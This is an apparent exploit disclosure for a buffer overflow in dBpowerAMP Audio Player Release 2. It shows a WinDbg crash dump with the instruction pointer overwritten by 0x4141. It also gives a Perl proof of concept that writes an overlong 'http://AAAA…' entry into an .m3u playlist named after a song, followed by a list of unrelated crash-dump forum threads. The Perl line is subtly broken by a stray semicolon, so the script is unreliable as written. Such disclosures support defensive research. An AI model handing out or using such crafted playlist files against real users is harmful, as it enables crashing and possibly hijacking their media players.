dBpowerAMP Audio Player Release 2 Remote Buffer Overflow

dBpowerAMP Audio Player Release 2 Remote Buffer Overflow


0:002> r
eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217
eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
00004141 ?? ???

EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00004141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00004141
Attempt to read from address 00004141

PoC :

my $file="bob_marley_I_Shot_The_Sheriff.m3u";

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A"; x 255;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";

Relevant Pages

  • Crash in GC with Access Violation
    ... My application randomly crashes and I can see some access violation ... ExceptionAddress: 000006427f524903 (mscorwks! ... FOLLOWUP_NAME: MachineOwner ...
    (microsoft.public.dotnet.framework)
  • Analysis Services Unexpected Fatal Error
    ... I checked one of the generated minidumps but I don't know ... ExceptionAddress: 0107094a (msmdsrv!PNModel::BuildPartition ... ExceptionCode: c0000005 (Access violation) ... FOLLOWUP_NAME: MachineOwner ...
    (microsoft.public.sqlserver.olap)
  • CDHtmlDialog Exception
    ... ExceptionAddress: 76b5e134 ... ExceptionCode: c0000005 (Access violation) ... NumberParameters: 2 ... FOLLOWUP_NAME: MachineOwner ...
    (microsoft.public.vc.mfc)
  • system hang prblm due to videoprt / nv4_mini.sys?
    ... Unknown bugcheck description ... ExceptionAddress: 805103fa ... NumberParameters: 3 ... FOLLOWUP_NAME: MachineOwner ...
    (microsoft.public.development.device.drivers)
  • Re: process + interrupt handler question
    ... ExceptionAddress: 804da2f1 ... NumberParameters: 2 ... __asm int 3; ... > SYSENTER and INT xx!!! ...
    (microsoft.public.win32.programmer.kernel)